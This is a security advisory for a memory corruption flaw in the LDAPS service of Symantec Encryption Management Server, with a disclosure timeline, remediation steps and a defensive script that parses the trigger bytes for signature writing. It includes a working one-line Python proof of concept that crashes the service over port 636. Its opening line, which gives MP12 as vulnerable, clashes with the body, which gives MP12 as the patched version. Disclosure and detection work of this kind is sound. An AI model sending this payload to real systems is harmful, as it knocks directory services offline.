Note: LDAPS Service Heap Memory Corruption vulnerability in SEMS <= 3.3.2 MP12 allowing reads from or writes to a memory location outside the buffer’s intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Summary

The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer’s intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Affected Versions

  • Symantec Encryption Management Server <= 3.3.2 MP11

CVSSv3 Score

7.5 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Technical Details

A repeatable crash was discovered in the LDAPS service running on the appliance. It can be reproduced with a single Python command:

$ python -c "import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.240.28.199',636));s.send('803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b'.decode('hex'))"

This triggers a SIGSEGV signal, causing the service to exit. Both LDAP and LDAPS become unavailable until the service automatically restarts — making this a reliable denial of service against the directory service at minimum, and worth further investigation for exploitation potential.
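
For detection work it helps to know what the published bytes are. The sketch below is an added example, not code from the advisory or from Symantec: it decodes the payload as an SSL 2.0-format ClientHello (field layout per RFC 5246 Appendix E.2) and flags length fields outside that appendix's limits. The function names are hypothetical, and the advisory does not state which field, if any, causes the crash.

```python
import struct

# Trigger bytes exactly as published in the advisory's one-liner (60 bytes).
ADVISORY_PAYLOAD = bytes.fromhex(
    "803a01030100030000002e00000040404141414142424242434343434444"
    "313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b"
)

def parse_v2_client_hello(data):
    """Decode the fixed header of an SSL 2.0-format ClientHello, else None."""
    if len(data) < 11 or not data[0] & 0x80:
        return None  # too short, or no 2-byte SSL 2.0 record header
    record_length = struct.unpack(">H", data[:2])[0] & 0x7FFF
    msg_type, major, minor, cs_len, sid_len, ch_len = struct.unpack(
        ">BBBHHH", data[2:11])
    if msg_type != 1:  # 1 = ClientHello
        return None
    return {"record_length": record_length, "version": (major, minor),
            "cipher_spec_length": cs_len, "session_id_length": sid_len,
            "challenge_length": ch_len}

def audit(data):
    """List length fields that fall outside the RFC 5246 E.2 limits."""
    hello = parse_v2_client_hello(data)
    if hello is None:
        return []
    issues = []
    cs, sid, ch = (hello["cipher_spec_length"], hello["session_id_length"],
                   hello["challenge_length"])
    if cs == 0 or cs % 3:
        issues.append("cipher_spec_length %d is not a non-zero multiple of 3" % cs)
    if not 16 <= ch <= 32:
        issues.append("challenge_length %d is outside 16..32" % ch)
    if 9 + cs + sid + ch != hello["record_length"]:
        issues.append("declared field lengths do not add up to the record length")
    if len(data) - 2 < hello["record_length"]:
        issues.append("record is truncated")
    return issues

if __name__ == "__main__":
    print(parse_v2_client_hello(ADVISORY_PAYLOAD))
    for issue in audit(ADVISORY_PAYLOAD):
        print("anomaly:", issue)
```

On the advisory payload this reports a single anomaly: a challenge length of 46 where 16 to 32 is permitted, with all declared lengths otherwise consistent. That condition is a candidate for a network signature on traffic to port 636.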

Timeline

Date        Event
2015-07-06  Vulnerability discovered
2015-07-30  Vendor contacted
2015-08-02  Vendor confirms issue
2016-02-19  Patch released (v3.3.2 MP12)
2016-06-07  Public disclosure

Remediation

Symantec product engineers have addressed these issues in Symantec Encryption Management Server 3.3.2 MP12. Customers should update to SEMS 3.3.2 MP12 as soon as possible to address these issues.

Credit

Discovered and reported by Toby Reynolds following responsible disclosure guidelines.